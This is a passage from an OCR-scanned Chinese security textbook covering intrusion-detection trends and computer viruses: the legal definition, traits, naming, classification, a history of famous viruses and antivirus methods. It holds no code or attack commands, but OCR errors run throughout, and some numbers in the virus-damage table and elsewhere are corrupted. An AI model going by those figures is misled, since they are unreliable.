个 蜜 钠 并 无 任何 实际 的 运行 活动 , 故 任何 接 入 都 被 认为 是 可 以 的 。 虚 拟 蜜 网 最 大 的 优势 
在 于 它 为 真实 的 主机 赢得 了 防范 人 侵 的 时 间 ,拖延 攻击 者 对 真实 目标 的 攻击 :同时 ,诱捕 
系统 能 够 不 断 获得 攻击 者 的 人 侵 行 为 ,为 真实 目标 制定 有 效 的 防护 策略 提供 依据 。 


2.3.4 入 侵 检 测 发 展 方向 


2.3.4.1 人 侵 技 术 的 发 展 变化 
人 入侵 技术 的 发 展 与 演化 主要 反映 在 下 列 几 个 方面 : 
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CD 入 侵 或 攻击 的 综合 化 与 复杂 化 。 由 于 网 络 防范 技术 的 多 重 化 ,攻击 的 难度 增加 ， 
使 得 入 侵 者 在 实施 入 侵 或 攻击 时 往往 同时 采取 多 种 人 侵 手段 ,以 保证 入 侵 的 成 功率 ,并 可 
在 攻击 实施 的 初期 掩盖 攻击 或 人 侵 的 真实 目的 。 

(2) 入 侵 主 体 对 象 的 间接 化 , 即 实施 入 侵 与 攻击 的 主体 的 隐蔽 化 。 通 过 一 定 的 技术 ， 
可 掩盖 攻击 主体 的 源 地 址 及 主机 位 置 。 使 用 了 隐蔽 技术 后 ,对 于 被 攻击 对 象 攻击 的 主体 
是 无 法 直接 确定 的 。 

(3) 入 侵 或 攻击 的 规模 扩大 。 随 着 战争 对 电子 技术 与 网 络 技 术 的 依赖 性 逐步 增强 ， 
其 已 逐步 发 展 升级 到 电子 战 与 信息 战 。 对 于 信息 战 ,无 论 其 规模 与 技术 ,都 不 能 与 一 般 意 
义 上 的 计算 机 网 络 的 入 侵 与 攻击 相提并论 。 国 家 主干 通信 和 网络 的 安全 与 主权 国家 领土 安 
全 居于 同等 地 位 。 

(4) 入 侵 或 攻击 技术 的 分 布 化 。 常 用 的 入 侵 与 攻击 行为 往往 由 单机 执行 。 由 于 防范 
技术 的 发 展 使 得 此 类 行为 不 能 奏效 ,所 谓 的 分 布 式 拒 绝 服务 (DDoS) 在 很 短 时 间 内 可 造成 
被 攻击 主机 的 瘫痪 。 此 类 分 布 式 攻击 的 信息 模式 与 正常 通信 无 差异 ,往往 在 攻击 发 动 的 
初期 不 易 被 确认 。 分 布 式 攻击 是 近期 最 常用 的 攻击 手段 。 

(5) 攻击 对 象 的 转移 。 入 侵 与 攻击 常 以 网 络 为 侵犯 的 主体 ,但 近期 的 攻击 行为 却 发 
生 了 策略 性 的 改变 ,由 攻击 网 络 改 为 攻击 网 络 的 防护 系统 。 现 已 有 专门 针对 IDS 作 攻 击 
的 报道 。 攻 击 者 详细 地 分 析 了 IDS 的 审计 方式 .特征 描述 .通信 模式 ,并 针对 IDS 的 弱点 
加 以 攻击 。 

2.3.4.2 和 人 侵 检测 的 发 展 方向 

人 侵 检测 技术 的 未 来 发 展 方向 包括 以 下 方面 : 

CD 分 布 式 入 侵 检 测 。 一 方面 ,针对 分 布 式 网 络 攻击 的 检测 方法 ; 另 一 方面 ,使 用 分 
布 式 的 方法 来 检测 网 络 攻击 ,涉及 的 关键 技术 为 检测 协同 机 制 与 入侵 攻击 的 全 局 信息 
提取 。 

(2) 智能 化 入侵 检测 ,即使 用 智能 化 的 方法 与 手段 来 进行 入 侵 检 测 。 现 阶段 常用 的 
智能 算法 有 神经 网 络 、 遗 传 算 法 、 模 糊 技 术 、 免 疫 原 理 等 方法 ,这 些 方法 常用 于 入 侵 特征 的 
辨识 与 泛 化 。 利 用 专家 系统 的 思想 来 构建 人 侵 检 测 系统 也 是 常用 的 方法 之 一 。 

(3) 全 面 的 安全 防御 方案 ,即使 用 安全 工程 风险 管理 的 思想 与 方法 来 处 理 网 络 安全 
问题 ,将 网 络 安 全 作为 一 个 整体 工程 来 处 理 。 从 管理 .网 络 结构 、 加 密 通 道 , 防 火 墙 \ 病 毒 
防护 、 入 侵 检测 多 方位 对 所 关注 的 网 络 作出 评估 ,并 提出 可 行 的 全 面 解决 方案 。 


2.4 计算 机 病毒 学 


2.4.1 计算 机 病毒 定义 


计算 机 病毒 (computer virus) 在 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》 中 
被 明确 定义 ,病毒 是 指 “ 编 制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 ， 
影响 计算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 ”。 
计算 机 病毒 往往 会 利用 计算 机 操作 系统 的 弱点 进行 传播 ,提高 系统 的 安全 性 是 防 病 
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毒 的 一 个 重要 方面 ,但 过 于 强调 提高 系统 的 安全 性 将 使 系统 多 数 时 间 用 于 病毒 检查 ,使 系 
统 失去 了 可 用 性 、 实 用 性 和 易 用 性 ; 另 一 方面 .信息 保密 的 要 求 让 人 们 在 泄密 和 防 病 毒 之 
间 无 法 选择 。 病 毒 与 反 病 毒 将 作为 一 类 对 抗 技术 长 期 存在 ,两 种 技术 都 将 随 计算 机 技术 
的 发 展 而 得 到 长 期 的 发 展 。 

首先 ,应 该 明确 病毒 不 是 来 源 于 突 发 或 偶然 的 原因 。 一 次 突 发 的 停电 和 偶然 的 错误 ， 
会 在 计算 机 的 磁盘 和 内 存 中 产生 一 些 乱码 和 随机 指令 ,但 这 些 代 码 是 无 序 和 混乱 的 ;病毒 
则 是 一 种 精巧 严谨 的 代码 ,按照 严格 的 秩序 组 织 起 来 ,与 所 在 的 系统 网 络 环境 相 适应 和 配 
合 起 来 ,病毒 不 会 通过 偶然 形成 ,并 且 需 要 有 一 定 的 长 度 , 这 个 基本 的 长 度 从 概率 上 来 讲 
是 不 可 能 通过 随机 代码 产生 的 。 现 在 流行 的 病毒 都 是 人 为 故意 编写 的 ,多 数 病毒 可 以 找 
到 作者 和 产地 信息 。 从 大 量 的 统计 分 析 来 看 ,编写 病毒 的 目的 是 : 一 些 天 才 的 程序 员 为 
了 表现 自己 和 证 明 自 己 的 能 力 , 出 于 对 上 司 的 不 满 ,为 了 好 奇 , 为 了 报复 ,为 了 祝贺 和 求 
爱 , 为 了 得 到 控制 口令 等 ,当然 也 有 出 于 政治 .军事 .宗教 .民族 等 方面 的 需求 而 专门 编写 
的 ,其 中 也 包括 一 些 病毒 研究 机 构 和 黑客 的 测试 病毒 。 


2.4.1.1 病毒 特征 

计算 机 病毒 具有 以 下 几 个 特点 : 

CD 寄生 性 。 计 算 机 病毒 寄生 在 其 他 程序 之 中 , 当 执行 这 个 程序 时 ,病毒 就 起 破坏 作 
用 ,而 在 未 启动 这 个 程序 之 前 , 它 是 不 易 被 人 发 觉 的 。 

(2) 传染 性 。 计 算 机 病毒 不 但 本 身 具 有 破坏 性 ,更 具有 传染 性 ,一 旦 病毒 被 复制 或 产 
生变 种 ,其 速度 之 快 令 人 难以 预防 。 传 染 性 是 病毒 的 基本 特征 。 计 算 机 病毒 会 通过 各 种 
渠道 从 已 被 感染 的 计算 机 扩散 到 未 被 感染 的 计算 机 ,在 某 些 情 况 下 造成 被 感染 的 计算 机 
工作 失常 甚至 瘫痪 。 是 否 具有 传染 性 是 判别 一 个 程序 是 否 为 计算 机 病毒 的 最 重要 条 件 。 
病毒 程序 通过 修改 磁盘 扇 区 信息 或 文件 内 容 将 自身 艇 入 到 系统 应 用 程序 内 部 ,被 嵌入 的 
程序 叫做 宿主 程序 。 

G) 潜伏 性 。 有 些 病毒 像 定时 炸弹 一 样 ,发作 时 间 是 预先 设计 好 的 。 比 如 ,黑色 星 
期 五 病毒 ,不 到 预定 时 间 无 法 觉察 , 当 条 件 具 备 时 , 则 会 产生 对 系统 的 巨大 破坏 。 潜 伏 
性 越 好 ,其 在 系统 中 的 存在 时 间 就 越 长 ,病毒 的 传染 范围 就 越 大 。 潜 伏 性 的 第 一 种 表 
现 是 指 ,病毒 程序 不 用 专用 检测 程序 无 法 检查 出 来 ;潜伏 性 的 第 二 种 表现 是 指 , 计 算 机 
病毒 的 内 部 往往 有 一 种 触发 机 制 , 不 满足 触发 条 件 时 ,计算 机 病毒 除了 传染 外 不 做 任 
何 破坏 。 

(4) 隐蔽 性 。 计 算 机 病毒 具有 很 强 的 隐蔽 性 ,有 的 可 以 通过 病毒 软件 检查 出 来 ,有 的 
根本 就 查 不 出 来 ,这 类 病毒 处 理 起 来 通常 很 困难 。 

(5) 破坏 性 。 计 算 机 中 毒 后 ,会 导致 正常 的 程序 无 法 运行 ,删除 或 破坏 计算 机 内 的 
文件 。 


2.4.1.2 病毒 命名 

病毒 命名 的 一 般 格式 为 : 

二 病毒 前 级 二. TEA >. RR 

病毒 前 级 是 指 一 个 病毒 的 种 类 ,用 来 区 别 病毒 的 种 族 。 不 同 种 类 的 病毒 ,其 前 级 也 是 
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不 同 的 。 比 如 ,常见 的 木马 病毒 的 前 缀 是 Trojan .蠕虫 病毒 的 前 级 是 Worm 等 。 

病毒 名 是 指 一 个 病毒 的 家 族 特征 ,用 来 区 别 和 标识 病毒 家 族 。 比 如 ,著名 的 CIH 病 
毒 的 家 族 名 都 是 统一 的 ” CIH ”, 振 荡 波 蠕虫 病毒 的 家 族 名 是 ”Sasser ”。 

病毒 后 级 是 指 一 个 病毒 的 变种 特征 ,用 来 区 别 具 体 某 个 家 族 病毒 的 变种 ,一 般 都 采用 
英文 中 的 26 个 字母 来 表示 。 比 如 ,Worm. Sasser. b 是 指 振 荡 波 蠕虫 病毒 的 变种 B, 一 般 
称 为 “振荡 波 B 变种 ”或 者 “振荡 波 变 种 В”. 

病毒 的 主 名 称 是 由 分 析 员 根据 病毒 体 的 特征 字符 串 、 特 定 行为 或 者 所 使 用 的 编译 平 
台 来 定 的 ,如 果 无 法 确定 则 可 以 用 字符 串 “Agent? 来 代替 主 名 称 , 小 于 10KB 大 小 的 文件 
可 以 命名 为 "Small”。 

版 本 信息 只 允许 为 数字 ,对 于 版 本 信息 不 明确 的 不 加 版 本 信息 。 

如 果 病 毒 的 主 行为 类 型 行为 类 型 .宿主 文件 类 型 . 主 名称 均 相同 , 则 认为 是 同一 家 族 
的 病毒 ,这 时 要 用 变种 号 来 区 分 不 同 的 病毒 记录 。 如 果 一 位 版 本 号 不 够 用 则 最 多 可 以 扩 
展 3 位 ,并 且 均 为 小 写字 母 a~~z, 如 aa、ab、aaa、aab, 依 此 类 推 。 病 毒 的 版 本 号 码 由 系统 自 
动 计算 ,不 需要 人 工 输入 或 选择 。 


2.4.2 计算 机 病毒 分 类 


1. 按照 计算 机 病毒 存在 的 媒体 进行 分 类 

按照 计算 机 病毒 存在 的 媒体 ,病毒 可 分 为 网 络 病毒 .文件 病毒 .引导 型 病毒 。 网 络 病 
毒 通过 计算 机 网 络 传播 感染 网 络 中 的 可 执行 文件 ;文件 病毒 感染 计算 机 中 的 文件 (如 
COM、EXE、DOC 等 ); 引 导 型 病毒 感染 启动 扇 区 (Boot) 和 硬盘 的 系统 引导 扇 区 (MBR)。 
还 有 这 三 种 情况 的 混合 型 ,例如 ,多 型 病毒 (文件 和 引导 型 ) 感 染 文件 和 引导 扇 区 两 种 目 
标 , 这 样 的 病毒 通常 都 具有 复杂 的 算法 ,它们 使 用 非常 规 的 办 法 侵入 系统 ,同时 使 用 了 加 
密 和 变形 算法 。 

2, 按照 计算 机 病毒 传染 的 方法 进行 分 类 

按照 计算 机 病毒 传染 的 方法 ,病毒 可 分 为 驻 留 型 病毒 和 非 驻 留 型 病毒 。 驻 留 型 病毒 
感染 计算 机 后 ,把 自身 的 驻 留 部 分 放 在 内 存 (RAM) 中 ,这 一 部 分 程序 挂 接 系 统 并 合并 到 
操作 系统 中 去 ,处 于 激活 状态 ; 非 驻 留 型 病毒 在 得 到 机 会 激活 时 并 不 感染 计算 机 内 存 。 

3. 按照 病毒 破坏 的 能 力 进行 分 类 

CD 无 害 型 : 除了 传染 时 减少 磁盘 的 可 用 空间 外 ,对 系统 没有 其 他 影响 。 

(2) 无 危险 型 : 这 类 病毒 仅仅 是 减少 内 存 、. 显 示 图 像 ,发 出 声音 。 

(3) 危险 型 : 这 类 病毒 在 计算 机 系统 操作 中 造成 严重 的 错误 。 

(4) 非常 危险 型 : 这 类 病毒 删除 程序 .破坏 数据 、 清 除 系统 内 存 区 和 操作 系统 中 重要 
的 信息 ,由 病毒 引起 的 其 他 程序 产生 的 错误 也 会 破坏 文件 和 扇 区 。 

4. 按照 病毒 特有 的 算法 进行 分 类 

(1) 伴随 型 病毒 : 这 一 类 病毒 并 不 改变 文件 本 身 , 它 们 根据 算法 产生 EXE 文件 的 伴 
随 体 ,具有 同样 的 名 字 和 不 同 的 扩展 名 (COM), 例 如 , XCOPY. EXE 的 伴随 体 是 
XCOPY. COM。 病 毒 把 自身 写 和 人 COM 文件 并 不 改变 EXE 文件 , 当 DOS 加 载 文件 时 , 伴 
随 体 优先 被 执行 ,再 由 伴随 体 加 载 执 行 原来 的 EXE 文件 。 
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(2)“ 蠕 虫 ? 型 病毒 : 通过 计算 机 网 络 传播 ,不 改变 文件 和 资料 信息 ,利用 网 络 从 一 台 
机 器 的 内 存 传播 到 其 他 机 器 的 内 存 中 ,计算 网 络 地 址 ,将 自身 的 病毒 通过 网 络 发 送 。 

G) 寄生 型 病毒 : 除了 伴随 和 “蠕虫 "型 ,其 他 病毒 均 可 称 为 寄生 型 病毒 ,它们 依附 在 
系统 的 引导 扇 区 或 文件 中 ,通过 系统 的 功能 进行 传播 。 

(4) 诡秘 型 病毒 : 它们 一 般 不 直接 修改 DOS 中 断 和 扇 区 数据 ,而 是 通过 文件 缓冲 区 
进行 DOS 内 部 修改 ,利用 DOS 空闲 的 数据 区 进行 工作 。 

G) 变型 病毒 (又 称 幽 灵 病 毒 ) : 这 一 类 病毒 使 用 复杂 的 算法 ,使 自己 每 传播 一 份 都 
具有 不 同 的 内 容 和 长 度 。 变 型 病毒 一 般 由 一 段 混 有 无 关 指令 的 解码 算法 和 被 变化 过 的 病 
毒 体 组 成 。 

5. 按照 病毒 的 攻击 目标 进行 分 类 

(1) DOS 病毒 : 针对 DOS 操作 系统 开发 的 病毒 。 由 于 Windows 9x 病毒 的 出 现 ， 
DOS 病毒 几乎 绝迹 。 但 DOS 病毒 在 Windows 9x 环境 中 仍 可 以 进行 感染 活动 ,因此 若 执 
行 染 毒 文件 ,Windows 9x 用 户 的 系统 也 会 被 感染 。 

(2) Windows 病毒 : 针对 Windows 9x 操作 系统 的 病毒 。 现 在 的 计算 机 用 户 一 般 都 
安装 Windows 系统 ,其 中 最 典型 的 病毒 有 CIH 病毒 。 一 些 Windows 病毒 不 仅 在 
Windows 9x 上 正常 感染 ,还 可 以 感染 Windows NT 上 的 其 他 文件 。 

(3) 其 他 系统 病毒 : 主要 攻击 Linux, UNIX, OS? 及 嵌入 式 系统 的 病毒 。 由 于 系统 本 
身 的 复杂 性 ,这 类 病毒 数量 不 是 很 多 。 

6. 根据 链接 方式 进行 分 类 

(1) 源码 型 病毒 : 该 病毒 攻击 高 级 语言 编写 的 程序 ,在 高 级 语言 所 编写 的 程序 编译 
前 插入 源 程 序 中 ,经 编译 成 为 合法 程序 的 一 部 分 。 

(2) ЛА. 这 种 病毒 是 将 自身 嵌入 到 现 有 程序 中 ,把 计算 机 病毒 的 主体 程序 
与 其 攻击 的 对 象 以 插入 的 方式 链接 。 这 种 计算 机 病毒 是 难以 编写 的 ,一 旦 侵入 程序 体 后 
也 较 难 消除 。 如 果 同 时 采用 多 态 性 病毒 技术 ,超级 病毒 技术 和 隐蔽 性 病毒 技术 ,将 给 当前 
的 反 病 毒 技 术 带 来 严峻 的 挑战 。 

(з) 外 壳 型 病毒 : 外 过 型 病毒 将 其 自身 包围 在 主 程序 的 四 周 , 对 原来 的 程序 不 作 修 
改 。 这 种 病毒 最 为 常见 ,易于 编写 ,也 易于 发 现 ,一般 测试 文件 的 大 小 即 可 察觉 。 

(4) 操作 系统 型 病毒 : 这 种 病毒 用 自身 的 程序 加 入 或 取代 部 分 操作 系统 进行 工作 ， 
有 具 有 很 强 的 破坏 力 , 可 以 导致 整个 系统 的 瘫痪 。 圆 点 病毒 和 大 麻 病 毒 就 是 典型 的 操作 系 


2.4.3 病毒 危害 与 防范 


1983 年 11 H 3 H Fred Cohen 博士 研制 出 一 种 在 运行 过 程 中 可 以 复制 自身 的 破坏 
性 程序 。Len Adleman 将 这 种 破坏 性 程序 命名 为 计算 机 病毒 ,并 在 每 周一 次 的 计算 机 安 
全 讨论 会 上 正式 提出 ,8 小 时 后 专家 们 在 VAX11/750 计算 机 系统 上 成 功 运行 该 程序 ,这 
样 ,第 一 个 病毒 实验 成 功 。 
计算 机 病毒 之 所 以 称 为 病毒 ,是 因为 其 具有 传染 的 本 质 。 传 染 渠道 通常 有 以 下 几 种 : 
(1) 通过 介质 。 由 于 使 用 带 有 病毒 的 介质 , 使 机 器 感染 病毒 发 病 , 并 传染 给 未 被 感 
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染 的 “干净 ”的 移动 介质 。 大 量 的 数据 交换 ,合法 或 非法 的 程序 复制 ,加 速 病毒 感染 。 

(2) 通过 硬盘 。 通 过 硬盘 传染 也 是 重要 的 渠道 , 由 于 带 有 病毒 的 机 器 移 到 其 他 地 方 
使 用 维修 等 ,使 病毒 发 生 扩散 .。 

(3) 通过 网 络 。 这 种 传染 扩散 极 快 , 能 在 很 短 的 时 间 内 传 遍 整个 网 络 。 通 过 网 络 传 
染病 毒 有 两 种 途经 : 一 种 是 文件 下 载 ,这 些 被 浏览 的 或 是 被 下 载 的 文件 可 能 存在 病毒 ; 另 
一 种 是 电子 邮件 ,大 多 数 邮件 系统 提供 了 在 网 络 间 传 送 附带 格式 化 文档 邮件 的 功能 ,网 络 
使 用 的 简易 性 和 开放 性 使 得 这 种 威胁 越 来 越 严重 。 


2.4.3.1 计算 机 病毒 危害 

世界 上 已 出 现 的 最 著名 的 计算 机 病毒 包括 以 下 几 类 。 

1. Elk Cloner(1982 年 ) 

它 被 看 做 攻击 个 人 计算 机 的 第 一 款 全 球 病毒 。 它 通过 苹果 Apple 下 软盘 进行 传播 。 
这 个 病毒 被 放 在 一 个 游戏 磁盘 上 ,可 以 被 使 用 49 次 。 在 第 50 次 使 用 的 时 候 , 它 并 不 运行 
游戏 ,取而代之 的 是 打开 一 个 空白 屏幕 ,并 显示 一 首 短 诗 。 

2. Brain(1986 年 ) 

Brain 是 第 一 款 攻 击 DOS 操作 系统 的 病毒 ,可 以 感染 软盘 ,该 病毒 会 填充 满 软盘 上 未 
用 的 空间 ,而 导致 它 不 能 再 被 使 用 。 

3. Morris(1988 ££) 

该 病毒 程序 利用 了 系统 存在 的 弱点 进行 人 侵 ,Morris 设计 的 最 初 目的 并 不 是 搞 破 
坏 ,而 是 用 来 测量 网 络 的 大 小 。 但 是 ,由 于 程序 的 循环 没有 处 理 好 ,计算 机 会 不 停 地 执行 ， 
最 终 导 致死 机 。 

4. CIH(1998 年 ) 

CIH 病毒 是 迄今 为 止 破坏 性 最 严重 的 病毒 ,也 是 世界 上 首 例 破 坏 硬件 的 病毒 。 它 发 
作 时 不 仅 破 坏 硬盘 的 引导 区 和 分 区 表 , 而 且 破坏 计算 机 系统 BIOS ,导致 主板 损坏 。 此 病 
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5. Melissa( 1999 4 ) 

Melissa 是 最 早 通过 电子 邮件 传播 的 病毒 之 一 , 当 用 户 打 开 一 封 电子 邮件 的 附件 , 病 
毒 会 自动 发 送 到 用 户 通讯 短 中 的 前 50 个 地 址 ,因此 这 个 病毒 在 数 小 时 之 内 传 遍 全 球 。 

6. Love bug(2000 年 ) 

Love bug 也 是 通过 电子 邮件 附件 进行 传播 ,把 病毒 伪装 成 一 封 求爱 信 来 欺骗 收 件 人 
打开 。 这 个 病毒 以 其 传播 速度 和 范围 让 安全 专家 上 吃惊。 在 数 小 时 之 内 ,这 个 小 小 的 计算 
机 程序 征服 了 全 世界 范围 之 内 的 计算 机 系统 。 

7. 红色 代码 (2001 年 ) 

红色 代码 被 认为 是 史上 最 昂贵 的 计算 机 病毒 之 一 ,这 个 自我 复制 的 恶意 病毒 利用 了 
微软 TIS 服务 器 中 的 一 个 漏洞 。 该 蠕虫 病毒 具有 一 个 更 恶毒 的 版 本 ,被 称 做 红色 代码 工 ， 
被 感染 的 系统 性 能 会 严重 下 降 。 

8. Nimda(2001 年 ) 

尼 姆 达 (Nimda) 是 历史 上 传播 速度 最 快 的 病毒 之 一 ,在 上 线 之 后 的 22 分 钟 之 后 就 成 
为 传播 最 广 的 病毒 。 
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9. 冲击 波 (2003 年 ) 

冲击 波 病毒 的 英文 名 称 是 Blaster, 还 被 叫做 Lovsan 或 Lovesan, 它 利用 了 微软 软件 
中 的 一 个 缺陷 ,对 系统 端口 进行 疯狂 攻击 ,可 以 导致 系统 崩溃 。 

10. 震荡 波 (2004 年 ) 

震荡 波 是 又 一 个 利用 Windows 缺陷 的 蠕虫 病毒 ,可 以 导致 计算 机 骨 溃 并 不 断 重 启 。 

11. 熊猫 烧香 (2007 年 ) 

熊猫 烧香 会 使 所 有 程序 图 标 变 成 熊猫 烧香 ,并 使 它们 不 能 应 用 。 

12. 扫荡 波 (2008 年 ) 

扫荡 波 也 是 个 利用 漏洞 从 网 络 入 侵 的 程序 。 大 批 用 户 关 闭 自 动 更 新 以 后 ,加 剧 了 这 
个 病毒 的 蔓延 ,可 以 导致 被 攻击 者 的 机 器 被 完全 控制 。 

13. 木马 下 载 器 (2009 年 ) 

此 病毒 会 产生 1000— 2000 个 不 等 的 木马 病毒 ,导致 系统 崩溃 。 

14. 鬼 影 病毒 (2010 年 ) 

该 病毒 成 功 运 行 后 ,在 进程 中 、 系 统 启 动 加 载 项 里 找 不 到 任何 异常 ,同时 即使 格式 化 
重 装 系统 ,也 无 法 彻底 清除 该 病毒 。 

表 2.1 显示 了 近年 来 几 个 病毒 带 来 的 巨大 危害 。 


表 2.1 重大 病毒 危害 列表 


年 份 攻击 行为 发 起 者 受害 PC 数目 损失 金额 (美元 ) 
2006 木马 和 恶意 软件 (破坏 程度 不 可 估计 ) (破坏 程度 不 可 估计 ) 
2005 木马 (破坏 程度 不 可 估计 ) (破坏 程度 不 可 估计 ) 
2004 Worm_Sasser( 震 荡 波 ) (破坏 程度 不 可 估计 》 (破坏 程度 不 可 估计 ) 
2003 Worm_MSBLAST( 冲 击 波 ) 超过 140 万 台 (破坏 程度 不 可 估计 ) 
2003 SQL Slammer 超过 20 万 台 9.54Z~12 亿 

2002 Klez 超过 600 万 台 90 亿 

2001 RedCode 超过 100 万 台 26 亿 

2001 NIMDA 超过 800 万 台 60 亿 

2000 Love Letter (破坏 程度 不 可 估计 ) 88 (2, 

1999 сїн 超过 6000 FA Ж 100 亿 


2.4.3.2 反 病 毒 技术 

从 反 病 毒 产 品 对 计算 机 病毒 的 作用 来 讲 , 反 病毒 技术 可 以 分 为 病毒 预防 技术 .病毒 检 
测 技术 及 病毒 清除 技术 。 

1. 病毒 预防 技术 

计算 机 病毒 的 预防 技术 就 是 通过 一 定 的 技术 手段 防止 计算 机 病毒 对 系统 的 传染 和 破 
坏 , 是 一 种 行为 规则 判定 技术 。 具 体 来 说 ,计算 机 病毒 的 预防 是 通过 阻止 计算 机 病毒 进入 
系统 内 存 或 阻止 计算 机 病毒 对 磁盘 的 操作 .尤其 是 写 操作 。 
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病毒 预防 技术 包括 磁盘 引导 区 保护 .加密 可 执行 程序 . 读 写 控制 技术 .系统 监控 技术 
等 。 计 算 机 病毒 的 预防 应 用 包括 对 已 知 病毒 的 预防 和 对 未 知 病毒 的 预防 两 个 部 分 。 目 
前 ,对 已 知 病毒 的 预防 可 以 采用 特征 判定 技术 或 静态 判定 技术 ;而 对 未 知 病毒 的 预防 则 是 
一 种 行为 规则 的 判定 技术 , 即 动态 判定 技术 。 

2. 病毒 检测 技术 

计算 机 病毒 的 检测 技术 是 指 通 过 一 定 的 技术 手段 判定 出 特定 计算 机 病毒 的 一 种 技 
术 。 它 有 两 种 : 一 种 是 根据 计算 机 病毒 的 关键 字 、 特 征程 序 段 内 容 、 病 毒 特征 及 传染 方 
3C 文件 长 度 的 变化 ,在 特征 分 类 的 基础 上 建立 的 病毒 检测 技术 ; 另 一 种 是 不 针对 具体 病 
毒 程序 的 自身 校 验 技术 , 即 对 某 个 文件 或 数据 段 进行 检验 和 计算 并 保存 其 结果 ,以 后 定期 
或 不 定期 地 以 保存 的 结果 对 该 文件 或 数据 段 进 行 检验 , 若 出 现 差 异 , 即 表示 该 文件 或 数据 
段 的 完整 性 已 遭 到 破坏 ,感染 上 了 病毒 ,从 而 检测 到 病毒 的 存在 。 

3. 病毒 清除 技术 

计算 机 病毒 的 清除 技术 是 计算 机 病毒 检测 技术 发 展 的 必然 结果 ,是 计算 机 病毒 传染 
程序 的 一 种 逆 过 程 。 目 前 ,清除 病毒 大 都 是 在 某 种 病毒 出 现 后 ,通过 对 其 进行 分 析 研 究 而 
研制 出 具有 相应 解毒 功能 的 软件 。 这 类 软件 技术 发 展 往往 是 被 动 的 , 带 有 滞后 性 。 由 于 
计算 机 软件 所 要 求 的 精确 性 ,解毒 软件 有 其 局 限 性 ,对 变种 病毒 的 清除 无 能 为 力 。 


2.4.4 防护 与 检测 策略 


在 网 络 环境 下 ,防范 病毒 问题 显得 尤其 重要 ,因此 ,采用 高 效 的 网 络 防 病毒 方法 和 技 
术 是 一 件 非 常 重要 的 事情 。 

2.4.4.1 病毒 防护 技术 

网 络 病毒 防护 有 以 下 四 种 基本 方法 。 

1. 基于 网 络 目 录 和 文件 安全 性 方法 

网 络 上 公用 目录 或 共享 目录 的 安全 性 防范 措施 ,对 于 防止 病毒 在 网 上 传播 起 到 积极 
作用 。 至 于 网 络 用 户 的 私人 目录 ,由 于 其 限于 个 别 使 用 ,病毒 很 难 传播 给 其 他 用 户 。 采 用 
基于 网 络 目录 和 文件 安全 性 的 方法 对 防止 病毒 起 到 了 一 定 作 用 ,但 是 这 种 方法 毕竟 是 基 
于 网 络 操作 系统 的 安全 性 的 设计 ,存在 着 局 限 性 。 

2. 采用 工作 站 防 病毒 芯片 

这 种 方法 是 将 防 病毒 功能 集成 在 一 个 芯片 上 ,安装 在 网 络 工作 站 上 ,以便 经 常 性 地 保 
护 工 作 站 及 其 通 往 服务 器 的 路 径 。 芯 片 具备 工作 站 存 取 控 制 与 病毒 保护 能 力 ,芯片 插 在 
网 卡 的 EPROM 槽 内 ,可 以 令 用 户 免除 许多 烦琐 的 管理 工作 。 

3. 采用 Station Lock 网 络 防毒 方法 

Station Lock 是 著名 防 病毒 产品 开发 商 Trend Micro Devices 公司 的 新 一 代 网 络 防 
病毒 产品 。 其 防毒 概念 是 建立 在 “病毒 必须 执行 有 限 数量 的 程序 之 后 , 才 会 产生 感染 效 
力 ” 的 基础 之 上 。 引 导 型 病毒 必须 使 用 系统 的 BIOS 功能 调用 ;文件 型 病毒 必须 将 自己 所 
有 的 程序 代码 复制 到 另 一 个 系统 执行 文件 时 才能 复制 感染 ;混合 型 病毒 和 多 形体 病毒 在 
实施 感染 之 前 也 必须 获取 系统 控制 权 , 才 能 运行 病毒 体 程序 而 实施 感染 。Station Lock 
就 是 通过 这 些 特点 ,用 间接 方法 观察 ,精确 地 预测 病毒 的 攻击 行为 。 其 作用 对 象 包括 多 型 
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体 病毒 和 未 来 型 病毒 。 

4. 基于 服务 器 的 防毒 技术 

服务 器 是 网 络 的 核心 ,一 旦 服务 器 被 病毒 感染 ,就 会 使 服务 器 无 法 启动 ,整个 网 络 陷 
于 瘫痪 ,造成 灾难 性 后 果 。 目 前 ,基于 服务 器 的 防治 病毒 方法 大 都 采用 了 NLM(NetWare 
load module) 技 术 , 以 NLM 模块 方式 进行 程序 设计 ,以 服务 器 为 基础 ,提供 实时 扫描 病毒 
能 力 。 市 场 上 的 产品 ,如 Central Point 公司 的 AntiVirus for Networks, Intel 公司 的 
LANdesk Virus Protect 以 及 南京 威 尔 德 计 算 机 公司 的 LANclear for NetWare 等 都 是 采 
用 以 服务 器 为 基础 的 防 病毒 技术 。 这 些 产 品 的 目的 都 是 保护 服务 器 ,使 服务 器 不 被 感染 。 
这 样 ,病毒 也 就 失去 了 传播 途径 ,因而 从 根本 上 杜绝 了 病毒 在 网 上 蔓延 。 

在 上 述 四 种 网 络 防毒 技术 中 ,Station Lock 是 一 种 针对 病毒 行为 的 防治 方法 ,Station 
Lock 目前 已 能 提供 Intel 以 太 网 络 接口 卡 支持 ,而 且 未 来 还 将 支持 各 种 普及 型 的 以 太 令 
牌 环 (Token-Ring) 网 络 接口 卡 。 基 于 服务 器 的 防治 病毒 方法 ,表现 在 可 以 集中 式 扫 毒 ， 
能 实现 实时 扫描 功能 ,软件 升级 方便 。 特 别 是 当 联 网 的 机 器 很 多 时 ,利用 这 种 方法 比 为 每 
台 工 作 站 都 安装 防 病毒 产品 要 节省 成 本 。 其 代表 性 的 产品 有 LANdesk, LANClear for 
NetWare 等 。 

5. 实时 反 病 毒 技术 

实时 反 病 毒 技术 一 向 为 反 病 毒 界 所 看 好 ,被 认为 是 比较 彻底 的 反 病 毒 解决 方案 。 多 
年 来 其 发 展 之 所 以 受到 制约 ,一 方面 是 因为 它 需要 占用 一 部 分 系统 资源 而 降低 系统 性 能 ; 
另 一 方面 是 因为 它 与 其 他 软件 (特别 是 操作 系统 ) 的 兼容 性 问题 始终 没有 得 到 很 好 的 
解决 。 

随 着 硬件 处 理 速度 的 不 断 提 高 ,实时 化 反 病 毒 技术 所 造成 的 系统 负荷 已 经 降低 到 了 
可 被 大 家 忽略 的 程度 ,而 Windows 操作 系统 的 多 任务 .多 线程 环境 ,又 为 实时 反 病 毒 技术 
提供 了 良好 的 运行 环境 。 实 时 反 病 毒 技术 重新 得 到 重视 。 

2.4.4.2 病毒 检测 技术 

1. 比较 法 

